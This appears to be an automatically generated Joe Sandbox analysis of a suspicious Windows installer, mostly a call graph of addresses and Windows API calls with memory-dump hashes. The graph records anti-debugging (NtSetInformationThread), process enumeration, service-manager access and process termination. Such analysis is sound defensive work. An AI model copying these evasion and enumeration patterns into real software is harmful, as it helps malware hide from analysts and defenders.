6bf589d0 std::ios_base::_Ios_base_dtor _strlen 100381->100384 100382 6bf58f36 100386 6c0c6a43 std::_Facet_Register 4 API calls 100382->100386 100383 6bf58f1f 100385 6c0c6a43 std::_Facet_Register 4 API calls 100383->100385 100384->100310 100384->100382 100384->100383 100389 6bf58ecd _Yarn _strlen 100384->100389 100385->100389 100386->100389 100387 6bf59354 100390 6c0c6a43 std::_Facet_Register 4 API calls 100387->100390 100388 6bf5936d 100391 6c0c6a43 std::_Facet_Register 4 API calls 100388->100391 100389->100330 100389->100387 100389->100388 100392 6bf59307 _Yarn 100389->100392 100390->100392 100391->100392 100393 6c0c5960 104 API calls 100392->100393 100395 6bf593ba std::ios_base::_Ios_base_dtor 100393->100395 100394 6c0c4ff0 4 API calls 100394->100322 100395->100310 100395->100394 100396 6c0c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100396->100398 100397 6c0c4ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 100397->100398 100398->100310 100398->100322 100398->100329 100398->100330 100398->100348 100398->100396 100398->100397 100400 6c0baed6 FindFirstFileA 100399->100400 100401 6c0baed4 100399->100401 100402 6c0baf10 100400->100402 100401->100400 100402->100319 100404 6c0c50ca 100403->100404 100405 6c0c5080 WaitForSingleObject CloseHandle CloseHandle 100404->100405 100406 6c0c50e3 100404->100406 100405->100404 100406->100328 100408 6c0c59b7 100407->100408 100440 6c0c5ff0 100408->100440 100410 6c0c59c8 100459 6bf66ba0 100410->100459 100413 6c0c5a9f std::ios_base::_Ios_base_dtor 100416 6bf8e010 67 API calls 100413->100416 100415 6c0c59ec 100417 6c0c5a54 100415->100417 100423 6c0c5a67 100415->100423 100478 6c0c6340 100415->100478 100486 6bfa2000 100415->100486 100420 6c0c5ae2 std::ios_base::_Ios_base_dtor 100416->100420 100496 6c0c5b90 100417->100496 100420->100342 100421 6c0c5a5c 100517 6bf67090 100421->100517 100511 6bf8e010 100423->100511 100425 6c0c6a48 100424->100425 100426 6c0c6a62 
100425->100426 100429 6c0c6a64 std::_Facet_Register 100425->100429 100976 6c0cf014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100425->100976 100426->100316 100428 6c0c78c3 std::_Facet_Register 100980 6c0c9379 RaiseException 100428->100980 100429->100428 100977 6c0c9379 RaiseException 100429->100977 100431 6c0c80bc IsProcessorFeaturePresent 100437 6c0c80e1 100431->100437 100433 6c0c7883 100978 6c0c9379 RaiseException 100433->100978 100435 6c0c78a3 std::invalid_argument::invalid_argument 100979 6c0c9379 RaiseException 100435->100979 100437->100316 100439->100332 100441 6c0c6025 100440->100441 100530 6bf92020 100441->100530 100443 6c0c60c6 100444 6c0c6a43 std::_Facet_Register 4 API calls 100443->100444 100445 6c0c60fe 100444->100445 100547 6c0c7327 100445->100547 100447 6c0c6112 100559 6bf91d90 100447->100559 100450 6c0c61ec 100450->100410 100452 6c0c6226 100567 6bf926e0 24 API calls 4 library calls 100452->100567 100454 6c0c6238 100568 6c0c9379 RaiseException 100454->100568 100456 6c0c624d 100457 6bf8e010 67 API calls 100456->100457 100458 6c0c625f 100457->100458 100458->100410 100460 6bf66bd5 100459->100460 100461 6bf92020 52 API calls 100460->100461 100462 6bf66c68 100461->100462 100463 6c0c6a43 std::_Facet_Register 4 API calls 100462->100463 100464 6bf66ca0 100463->100464 100465 6c0c7327 43 API calls 100464->100465 100466 6bf66cb4 100465->100466 100467 6bf91d90 89 API calls 100466->100467 100468 6bf66d5d 100467->100468 100469 6bf66d8e 100468->100469 100878 6bf92250 30 API calls 100468->100878 100469->100415 100471 6bf66dc8 100879 6bf926e0 24 API calls 4 library calls 100471->100879 100473 6bf66dda 100880 6c0c9379 RaiseException 100473->100880 100475 6bf66def 100476 6bf8e010 67 API calls 100475->100476 100477 6bf66e0f 100476->100477 100477->100415 100479 6c0c638d 100478->100479 100881 6c0c65a0 100479->100881 100481 6c0c647c 100481->100415 100484 6c0c63a5 100484->100481 100899 6bf92250 30 API calls 100484->100899 100900 6bf926e0 24 API calls 4 
library calls 100484->100900 100901 6c0c9379 RaiseException 100484->100901 100487 6bfa203f 100486->100487 100490 6bfa2053 100487->100490 100910 6bf93560 32 API calls std::_Xinvalid_argument 100487->100910 100491 6bfa210e 100490->100491 100912 6bf92250 30 API calls 100490->100912 100913 6bf926e0 24 API calls 4 library calls 100490->100913 100914 6c0c9379 RaiseException 100490->100914 100492 6bfa2121 100491->100492 100911 6bf937e0 32 API calls std::_Xinvalid_argument 100491->100911 100492->100415 100497 6c0c5b9e 100496->100497 100500 6c0c5bd1 100496->100500 100915 6bf901f0 100497->100915 100498 6c0c5c83 100498->100421 100500->100498 100919 6bf92250 30 API calls 100500->100919 100503 6c0d0b18 67 API calls 100503->100500 100504 6c0c5cae 100920 6bf92340 24 API calls 100504->100920 100506 6c0c5cbe 100921 6c0c9379 RaiseException 100506->100921 100508 6c0c5cc9 100509 6bf8e010 67 API calls 100508->100509 100510 6c0c5d22 std::ios_base::_Ios_base_dtor 100509->100510 100510->100421 100512 6bf8e04b 100511->100512 100513 6bf8e0a3 100512->100513 100514 6bf901f0 64 API calls 100512->100514 100513->100413 100515 6bf8e098 100514->100515 100516 6c0d0b18 67 API calls 100515->100516 100516->100513 100518 6bf6709e 100517->100518 100521 6bf670d1 100517->100521 100519 6bf901f0 64 API calls 100518->100519 100522 6bf670c4 100519->100522 100520 6bf67183 100520->100423 100521->100520 100973 6bf92250 30 API calls 100521->100973 100524 6c0d0b18 67 API calls 100522->100524 100524->100521 100525 6bf671ae 100974 6bf92340 24 API calls 100525->100974 100527 6bf671be 100975 6c0c9379 RaiseException 100527->100975 100529 6bf671c9 100531 6c0c6a43 std::_Facet_Register 4 API calls 100530->100531 100532 6bf9207e 100531->100532 100533 6c0c7327 43 API calls 100532->100533 100534 6bf92092 100533->100534 100569 6bf92f60 42 API calls 4 library calls 100534->100569 100536 6bf920c8 100537 6bf9210d 100536->100537 100538 6bf92136 100536->100538 100539 6bf92120 100537->100539 100570 6c0c6f8e 9 API calls 2 library 
calls 100537->100570 100571 6bf92250 30 API calls 100538->100571 100539->100443 100542 6bf9215b 100572 6bf92340 24 API calls 100542->100572 100544 6bf92171 100573 6c0c9379 RaiseException 100544->100573 100546 6bf9217c 100546->100443 100548 6c0c7333 __EH_prolog3 100547->100548 100574 6c0c6eb5 100548->100574 100551 6c0c736f 100580 6c0c6ee6 100551->100580 100553 6c0c7351 100588 6c0c73ba 39 API calls std::locale::_Setgloballocale 100553->100588 100556 6c0c7359 100589 6c0c71b1 HeapFree GetLastError _Yarn 100556->100589 100557 6c0c73ac 100557->100447 100560 6bf91ddc 100559->100560 100561 6bf91dc7 100559->100561 100594 6c0c7447 100560->100594 100561->100450 100566 6bf92250 30 API calls 100561->100566 100565 6bf91e82 100566->100452 100567->100454 100568->100456 100569->100536 100570->100539 100571->100542 100572->100544 100573->100546 100575 6c0c6ecb 100574->100575 100576 6c0c6ec4 100574->100576 100579 6c0c6ec9 100575->100579 100591 6c0c858b EnterCriticalSection 100575->100591 100590 6c0d03cd 6 API calls std::_Lockit::_Lockit 100576->100590 100579->100551 100587 6c0c7230 6 API calls 2 library calls 100579->100587 100581 6c0d03db 100580->100581 100582 6c0c6ef0 100580->100582 100593 6c0d03b6 LeaveCriticalSection 100581->100593 100583 6c0c6f03 100582->100583 100592 6c0c8599 LeaveCriticalSection 100582->100592 100583->100557 100586 6c0d03e2 100586->100557 100587->100553 100588->100556 100589->100551 100590->100579 100591->100579 100592->100583 100593->100586 100595 6c0c7450 100594->100595 100596 6bf91dea 100595->100596 100603 6c0cfd4a 100595->100603 100596->100561 100602 6c0cc563 18 API calls __fassign 100596->100602 100598 6c0c749c 100598->100596 100614 6c0cfa58 65 API calls 100598->100614 100600 6c0c74b7 100600->100596 100615 6c0d0b18 100600->100615 100602->100565 100604 6c0cfd55 __wsopen_s 100603->100604 100605 6c0cfd68 100604->100605 100606 6c0cfd88 100604->100606 100640 6c0d0120 18 API calls __fassign 100605->100640 100613 6c0cfd78 100606->100613 100626 6c0dae0c 
100606->100626 100613->100598 100614->100600 100616 6c0d0b24 __wsopen_s 100615->100616 100617 6c0d0b43 100616->100617 100619 6c0d0b2e 100616->100619 100624 6c0d0b3e 100617->100624 100749 6c0cc5a9 EnterCriticalSection 100617->100749 100764 6c0d0120 18 API calls __fassign 100619->100764 100620 6c0d0b60 100750 6c0d0b9c 100620->100750 100623 6c0d0b6b 100765 6c0d0b92 LeaveCriticalSection 100623->100765 100624->100596 100627 6c0dae18 __wsopen_s 100626->100627 100642 6c0d039f EnterCriticalSection 100627->100642 100629 6c0dae26 100643 6c0daeb0 100629->100643 100634 6c0daf72 100635 6c0db091 100634->100635 100667 6c0db114 100635->100667 100638 6c0cfdcc 100641 6c0cfdf5 LeaveCriticalSection 100638->100641 100640->100613 100641->100613 100642->100629 100650 6c0daed3 100643->100650 100644 6c0dae33 100657 6c0dae6c 100644->100657 100645 6c0daf2b 100662 6c0d71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100645->100662 100647 6c0daf34 100663 6c0d47bb HeapFree GetLastError __dosmaperr 100647->100663 100650->100644 100650->100645 100660 6c0cc5a9 EnterCriticalSection 100650->100660 100661 6c0cc5bd LeaveCriticalSection 100650->100661 100651 6c0daf3d 100651->100644 100664 6c0d6c1f 6 API calls std::_Lockit::_Lockit 100651->100664 100653 6c0daf5c 100665 6c0cc5a9 EnterCriticalSection 100653->100665 100656 6c0daf6f 100656->100644 100666 6c0d03b6 LeaveCriticalSection 100657->100666 100659 6c0cfda3 100659->100613 100659->100634 100660->100650 100661->100650 100662->100647 100663->100651 100664->100653 100665->100656 100666->100659 100668 6c0db133 100667->100668 100669 6c0db146 100668->100669 100672 6c0db15b 100668->100672 100683 6c0d0120 18 API calls __fassign 100669->100683 100671 6c0db0a7 100671->100638 100680 6c0e3fde 100671->100680 100676 6c0db27b 100672->100676 100684 6c0e3ea8 37 API calls __fassign 100672->100684 100675 6c0db2cb 100675->100676 100685 6c0e3ea8 37 API calls __fassign 100675->100685 100676->100671 100687 6c0d0120 18 API calls 
__fassign 100676->100687 100678 6c0db2e9 100678->100676 100686 6c0e3ea8 37 API calls __fassign 100678->100686 100688 6c0e4396 100680->100688 100683->100671 100684->100675 100685->100678 100686->100676 100687->100671 100689 6c0e43a2 __wsopen_s 100688->100689 100690 6c0e43a9 100689->100690 100691 6c0e43d4 100689->100691 100706 6c0d0120 18 API calls __fassign 100690->100706 100697 6c0e3ffe 100691->100697 100696 6c0e3ff9 100696->100638 100708 6c0d06cb 100697->100708 100703 6c0e4034 100704 6c0e4066 100703->100704 100748 6c0d47bb HeapFree GetLastError __dosmaperr 100703->100748 100707 6c0e442b LeaveCriticalSection __wsopen_s 100704->100707 100706->100696 100707->100696 100709 6c0cbceb __fassign 37 API calls 100708->100709 100710 6c0d06dd 100709->100710 100711 6c0d06ef 100710->100711 100712 6c0d69d5 __wsopen_s 5 API calls 100710->100712 100713 6c0cbdf6 100711->100713 100712->100711 100714 6c0cbe4e __wsopen_s GetLastError HeapFree GetLastError MultiByteToWideChar 100713->100714 100715 6c0cbe0e 100714->100715 100715->100703 100716 6c0e406c 100715->100716 100717 6c0e44ec __wsopen_s 18 API calls 100716->100717 100718 6c0e4089 100717->100718 100719 6c0e160c __wsopen_s 14 API calls 100718->100719 100723 6c0e409e __dosmaperr 100718->100723 100720 6c0e40bc 100719->100720 100721 6c0e4457 __wsopen_s CreateFileW 100720->100721 100720->100723 100727 6c0e4115 100721->100727 100722 6c0e4192 GetFileType 100725 6c0e419d GetLastError 100722->100725 100726 6c0e41e4 100722->100726 100723->100703 100724 6c0e4167 GetLastError 100724->100723 100728 6c0cf9f2 __dosmaperr 100725->100728 100731 6c0e17b0 __wsopen_s SetStdHandle 100726->100731 100727->100722 100727->100724 100729 6c0e4457 __wsopen_s CreateFileW 100727->100729 100730 6c0e41ab CloseHandle 100728->100730 100732 6c0e415a 100729->100732 100730->100723 100744 6c0e41d4 100730->100744 100733 6c0e4205 100731->100733 100732->100722 100732->100724 100734 6c0e4251 100733->100734 100736 6c0e4666 __wsopen_s 70 API calls 100733->100736 100735 
6c0e4710 __wsopen_s 70 API calls 100734->100735 100739 6c0e4258 100734->100739 100737 6c0e4286 100735->100737 100736->100734 100738 6c0e4294 100737->100738 100737->100739 100738->100723 100741 6c0e4310 CloseHandle 100738->100741 100740 6c0db925 __wsopen_s 21 API calls 100739->100740 100740->100723 100742 6c0e4457 __wsopen_s CreateFileW 100741->100742 100743 6c0e433b 100742->100743 100743->100744 100745 6c0e4345 GetLastError 100743->100745 100744->100723 100746 6c0e4351 __dosmaperr 100745->100746 100747 6c0e171f __wsopen_s SetStdHandle 100746->100747 100747->100744 100748->100704 100749->100620 100751 6c0d0bbe 100750->100751 100752 6c0d0ba9 100750->100752 100755 6c0d0bb9 100751->100755 100766 6c0d0cb9 100751->100766 100788 6c0d0120 18 API calls __fassign 100752->100788 100755->100623 100760 6c0d0be1 100781 6c0db898 100760->100781 100762 6c0d0be7 100762->100755 100789 6c0d47bb HeapFree GetLastError __dosmaperr 100762->100789 100764->100624 100765->100624 100767 6c0d0cd1 100766->100767 100771 6c0d0bd3 100766->100771 100768 6c0d9c60 18 API calls 100767->100768 100767->100771 100769 6c0d0cef 100768->100769 100790 6c0dbb6c 100769->100790 100772 6c0d873e 100771->100772 100773 6c0d8755 100772->100773 100775 6c0d0bdb 100772->100775 100773->100775 100846 6c0d47bb HeapFree GetLastError __dosmaperr 100773->100846 100776 6c0d9c60 100775->100776 100777 6c0d9c6c 100776->100777 100778 6c0d9c81 100776->100778 100847 6c0d0120 18 API calls __fassign 100777->100847 100778->100760 100780 6c0d9c7c 100780->100760 100782 6c0db8a9 __dosmaperr 100781->100782 100783 6c0db8be 100781->100783 100782->100762 100784 6c0db907 __dosmaperr 100783->100784 100785 6c0db8e5 100783->100785 100856 6c0d0120 18 API calls __fassign 100784->100856 100848 6c0db9c1 100785->100848 100788->100755 100789->100755 100792 6c0dbb78 __wsopen_s 100790->100792 100791 6c0dbb80 __dosmaperr 100791->100771 100792->100791 100793 6c0dbbca 100792->100793 100794 6c0dbc33 __dosmaperr 100792->100794 100801 6c0e1990 
EnterCriticalSection 100793->100801 100831 6c0d0120 18 API calls __fassign 100794->100831 100796 6c0dbbd0 100799 6c0dbbec __dosmaperr 100796->100799 100802 6c0dbc5e 100796->100802 100830 6c0dbc2b LeaveCriticalSection __wsopen_s 100799->100830 100801->100796 100803 6c0dbc80 100802->100803 100822 6c0dbc9c __dosmaperr 100802->100822 100804 6c0dbcd4 100803->100804 100806 6c0dbc84 __dosmaperr 100803->100806 100805 6c0dbce7 100804->100805 100840 6c0dac69 20 API calls __wsopen_s 100804->100840 100832 6c0dbe40 100805->100832 100839 6c0d0120 18 API calls __fassign 100806->100839 100811 6c0dbcfd 100815 6c0dbd26 100811->100815 100816 6c0dbd01 100811->100816 100812 6c0dbd3c 100813 6c0dbd95 WriteFile 100812->100813 100814 6c0dbd50 100812->100814 100817 6c0dbdb9 GetLastError 100813->100817 100813->100822 100819 6c0dbd5b 100814->100819 100820 6c0dbd85 100814->100820 100842 6c0dbeb1 43 API calls 5 library calls 100815->100842 100816->100822 100841 6c0dc25b 6 API calls __wsopen_s 100816->100841 100817->100822 100823 6c0dbd75 100819->100823 100824 6c0dbd60 100819->100824 100845 6c0dc2c3 7 API calls 2 library calls 100820->100845 100822->100799 100844 6c0dc487 8 API calls 3 library calls 100823->100844 100824->100822 100826 6c0dbd65 100824->100826 100843 6c0dc39e 7 API calls 2 library calls 100826->100843 100829 6c0dbd73 100829->100822 100830->100791 100831->100791 100833 6c0e19e5 __wsopen_s 18 API calls 100832->100833 100834 6c0dbe51 100833->100834 100835 6c0dbcf8 100834->100835 100836 6c0d49b2 __Getctype 37 API calls 100834->100836 100835->100811 100835->100812 100837 6c0dbe74 100836->100837 100837->100835 100838 6c0dbe8e GetConsoleMode 100837->100838 100838->100835 100839->100822 100840->100805 100841->100822 100842->100822 100843->100829 100844->100829 100845->100829 100846->100775 100847->100780 100849 6c0db9cd __wsopen_s 100848->100849 100857 6c0e1990 EnterCriticalSection 100849->100857 100851 6c0db9db 100853 6c0dba08 100851->100853 100858 6c0db925 100851->100858 100871 
6c0dba41 LeaveCriticalSection __wsopen_s 100853->100871 100855 6c0dba2a 100855->100782 100856->100782 100857->100851 100872 6c0e15a2 100858->100872 100860 6c0db935 100861 6c0db93b 100860->100861 100864 6c0e15a2 __wsopen_s 18 API calls 100860->100864 100870 6c0db96d 100860->100870 100877 6c0e171f SetStdHandle __dosmaperr __wsopen_s 100861->100877 100863 6c0db993 __dosmaperr 100863->100853 100866 6c0db964 100864->100866 100865 6c0e15a2 __wsopen_s 18 API calls 100867 6c0db979 CloseHandle 100865->100867 100868 6c0e15a2 __wsopen_s 18 API calls 100866->100868 100867->100861 100869 6c0db985 GetLastError 100867->100869 100868->100870 100869->100861 100870->100861 100870->100865 100871->100855 100874 6c0e15c4 __dosmaperr 100872->100874 100875 6c0e15af __dosmaperr 100872->100875 100873 6c0e15e9 100873->100860 100874->100873 100876 6c0d0120 __fassign 18 API calls 100874->100876 100875->100860 100876->100875 100877->100863 100878->100471 100879->100473 100880->100475 100882 6c0c65dc 100881->100882 100883 6c0c6608 100881->100883 100886 6c0c6601 100882->100886 100904 6bf92250 30 API calls 100882->100904 100885 6c0c6619 100883->100885 100902 6bf93560 32 API calls std::_Xinvalid_argument 100883->100902 100885->100886 100903 6bf92f60 42 API calls 4 library calls 100885->100903 100886->100484 100888 6c0c67e8 100905 6bf92340 24 API calls 100888->100905 100890 6c0c67f7 100906 6c0c9379 RaiseException 100890->100906 100894 6c0c6827 100908 6bf92340 24 API calls 100894->100908 100896 6c0c683d 100909 6c0c9379 RaiseException 100896->100909 100898 6c0c6653 100898->100886 100907 6bf92250 30 API calls 100898->100907 100899->100484 100900->100484 100901->100484 100902->100885 100903->100898 100904->100888 100905->100890 100906->100898 100907->100894 100908->100896 100909->100886 100910->100490 100911->100492 100912->100490 100913->100490 100914->100490 100916 6bf9022e 100915->100916 100917 6bf904d6 100916->100917 100922 6c0d17db 100916->100922 100917->100503 100919->100504 100920->100506 
100921->100508 100923 6c0d1806 100922->100923 100924 6c0d17e9 100922->100924 100923->100916 100924->100923 100925 6c0d180a 100924->100925 100926 6c0d17f6 100924->100926 100930 6c0d1a02 100925->100930 100938 6c0d0120 18 API calls __fassign 100926->100938 100931 6c0d1a0e __wsopen_s 100930->100931 100939 6c0cc5a9 EnterCriticalSection 100931->100939 100933 6c0d1a1c 100940 6c0d19bf 100933->100940 100937 6c0d183c 100937->100916 100938->100923 100939->100933 100948 6c0d85a6 100940->100948 100946 6c0d19f9 100947 6c0d1a51 LeaveCriticalSection 100946->100947 100947->100937 100949 6c0d9c60 18 API calls 100948->100949 100950 6c0d85b7 100949->100950 100965 6c0e19e5 100950->100965 100952 6c0d85bd __wsopen_s 100953 6c0d19d3 100952->100953 100970 6c0d47bb HeapFree GetLastError __dosmaperr 100952->100970 100955 6c0d183e 100953->100955 100956 6c0d1850 100955->100956 100959 6c0d186e 100955->100959 100957 6c0d185e 100956->100957 100956->100959 100962 6c0d1886 _Yarn 100956->100962 100972 6c0d0120 18 API calls __fassign 100957->100972 100964 6c0d8659 62 API calls 100959->100964 100960 6c0d0cb9 62 API calls 100960->100962 100961 6c0d9c60 18 API calls 100961->100962 100962->100959 100962->100960 100962->100961 100963 6c0dbb6c __wsopen_s 62 API calls 100962->100963 100963->100962 100964->100946 100966 6c0e19f2 100965->100966 100968 6c0e19ff 100965->100968 100966->100952 100967 6c0e1a0b 100967->100952 100968->100967 100971 6c0d0120 18 API calls __fassign 100968->100971 100970->100953 100971->100966 100972->100959 100973->100525 100974->100527 100975->100529 100976->100425 100977->100433 100978->100435 100979->100428 100980->100431 100981 6c0cef3f 100982 6c0cef4b __wsopen_s 100981->100982 100983 6c0cef5f 100982->100983 100984 6c0cef52 GetLastError ExitThread 100982->100984 100993 6c0d49b2 GetLastError 100983->100993 100989 6c0cef7b 101026 6c0ceeaa 16 API calls 2 library calls 100989->101026 100992 6c0cef9d 100994 6c0d49c9 100993->100994 100995 6c0d49cf 100993->100995 101027 6c0d6b23 6 API 
calls std::_Lockit::_Lockit 100994->101027 100999 6c0d49d5 SetLastError 100995->100999 101028 6c0d6b62 6 API calls std::_Lockit::_Lockit 100995->101028 100998 6c0d49ed 100998->100999 101000 6c0d49f1 100998->101000 101006 6c0d4a69 100999->101006 101007 6c0cef64 100999->101007 101029 6c0d71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 101000->101029 101002 6c0d49fd 101004 6c0d4a1c 101002->101004 101005 6c0d4a05 101002->101005 101032 6c0d6b62 6 API calls std::_Lockit::_Lockit 101004->101032 101030 6c0d6b62 6 API calls std::_Lockit::_Lockit 101005->101030 101035 6c0d0ac9 37 API calls std::locale::_Setgloballocale 101006->101035 101020 6c0d9d66 101007->101020 101011 6c0d4a13 101031 6c0d47bb HeapFree GetLastError __dosmaperr 101011->101031 101013 6c0d4a28 101014 6c0d4a3d 101013->101014 101015 6c0d4a2c 101013->101015 101034 6c0d47bb HeapFree GetLastError __dosmaperr 101014->101034 101033 6c0d6b62 6 API calls std::_Lockit::_Lockit 101015->101033 101018 6c0d4a19 101018->100999 101021 6c0d9d78 GetPEB 101020->101021 101022 6c0cef6f 101020->101022 101021->101022 101023 6c0d9d8b 101021->101023 101022->100989 101025 6c0d6d6f 5 API calls std::_Lockit::_Lockit 101022->101025 101036 6c0d6e18 5 API calls std::_Lockit::_Lockit 101023->101036 101025->100989 101026->100992 101027->100995 101028->100998 101029->101002 101030->101011 101031->101018 101032->101013 101033->101011 101034->101018 101036->101022 101037 6bf43d62 101039 6bf43bc0 101037->101039 101038 6bf43e8a GetCurrentThread NtSetInformationThread 101040 6bf43eea 101038->101040 101039->101038 101041 6bf5f8a3 101043 6bf5f887 101041->101043 101042 6bf602ac GetCurrentProcess TerminateProcess 101044 6bf602ca 101042->101044 101043->101042 101045 6bf53b72 101046 6c0c6a43 std::_Facet_Register 4 API calls 101045->101046 101048 6bf537e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 101046->101048 101047 6c0baec0 FindFirstFileA 101047->101048 101048->101047 101050 6bf66ba0 104 API calls 
101048->101050 101052 6bf67090 77 API calls 101048->101052 101053 6bf8e010 67 API calls 101048->101053 101054 6bf6639e 101048->101054 101058 6bf66e60 101048->101058 101050->101048 101052->101048 101053->101048 101068 6c0d0130 18 API calls 2 library calls 101054->101068 101059 6bf66e9f 101058->101059 101060 6bf66eb3 101059->101060 101069 6bf93560 32 API calls std::_Xinvalid_argument 101059->101069 101063 6bf66f5b 101060->101063 101071 6bf92250 30 API calls 101060->101071 101072 6bf926e0 24 API calls 4 library calls 101060->101072 101073 6c0c9379 RaiseException 101060->101073 101065 6bf66f6e 101063->101065 101070 6bf937e0 32 API calls std::_Xinvalid_argument 101063->101070 101065->101048 101069->101060 101070->101065 101071->101060 101072->101060 101073->101060 101074 6bf44b53 101075 6c0c6a43 std::_Facet_Register 4 API calls 101074->101075 101076 6bf44b5c _Yarn 101075->101076 101077 6c0baec0 FindFirstFileA 101076->101077 101082 6bf44bae std::ios_base::_Ios_base_dtor 101077->101082 101078 6bf6639e 101255 6c0d0130 18 API calls 2 library calls 101078->101255 101080 6bf44cff 101081 6bf45164 CreateFileA CloseHandle 101086 6bf451ec 101081->101086 101082->101078 101082->101080 101082->101081 101083 6bf5245a _Yarn _strlen 101082->101083 101083->101078 101085 6c0baec0 FindFirstFileA 101083->101085 101100 6bf52a83 std::ios_base::_Ios_base_dtor 101085->101100 101232 6c0c5120 OpenSCManagerA 101086->101232 101088 6bf4fc00 101248 6c0c5240 CreateToolhelp32Snapshot 101088->101248 101091 6c0c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101127 6bf45478 std::ios_base::_Ios_base_dtor _Yarn _strlen 101091->101127 101093 6c0baec0 FindFirstFileA 101093->101127 101094 6bf537d0 Sleep 101138 6bf537e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 101094->101138 101095 6bf663b2 101256 6bf415e0 18 API calls std::ios_base::_Ios_base_dtor 101095->101256 101096 6c0c5240 4 API calls 101117 6bf5053a 101096->101117 101097 6c0c5240 4 API 
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _strlen
                                        • String ID: HR^
                                        • API String ID: 4218353326-1341859651
                                        • Opcode ID: 51981b0f123c8b7fda7a072c907d1ac6849b492bf9f785bbf21bc5bb42363aff
                                        • Instruction ID: 0a9c14aa832a8132d31c36b64bce4402c97426ecbcb0784fced2367b4b5edb65
                                        • Opcode Fuzzy Hash: 51981b0f123c8b7fda7a072c907d1ac6849b492bf9f785bbf21bc5bb42363aff
                                        • Instruction Fuzzy Hash: 0B74D873644B018FC728CF28C8D0695B7F3EF953147198A6DC09A8B766EB78B54ACB50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: }jk$;T55$L@^
                                        • API String ID: 0-4218709813
                                        • Opcode ID: 9eeb9fc12118888add023e24d805e1bd1b3fb8948e8b8114ee175cb42479a023
                                        • Instruction ID: 0687526a43a6179a4fe510fae3504aa0e3687840b62221c0f24ec427030f930b
                                        • Opcode Fuzzy Hash: 9eeb9fc12118888add023e24d805e1bd1b3fb8948e8b8114ee175cb42479a023
                                        • Instruction Fuzzy Hash: 553418736447018FC728CF28C8D0A95B7E3EFA5314B198A6DC0E64B765EB38B55ACB50

                                        Control-flow Graph

                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C0C524E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CreateSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3332741929-0
                                        • Opcode ID: e81d5a4d67b33feb007b59dc6c1b475563b2b48c3b12260d0d77bced9dcf7dfe
                                        • Instruction ID: 9df2e85a24ed6d71813130110880076a77d390e34ee64ce851a09314e2004afe
                                        • Opcode Fuzzy Hash: e81d5a4d67b33feb007b59dc6c1b475563b2b48c3b12260d0d77bced9dcf7dfe
                                        • Instruction Fuzzy Hash: 5F314978608300AFD7109F28C888B1EBBF4AF9A744F90492EF598C7360D3719848AB53

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
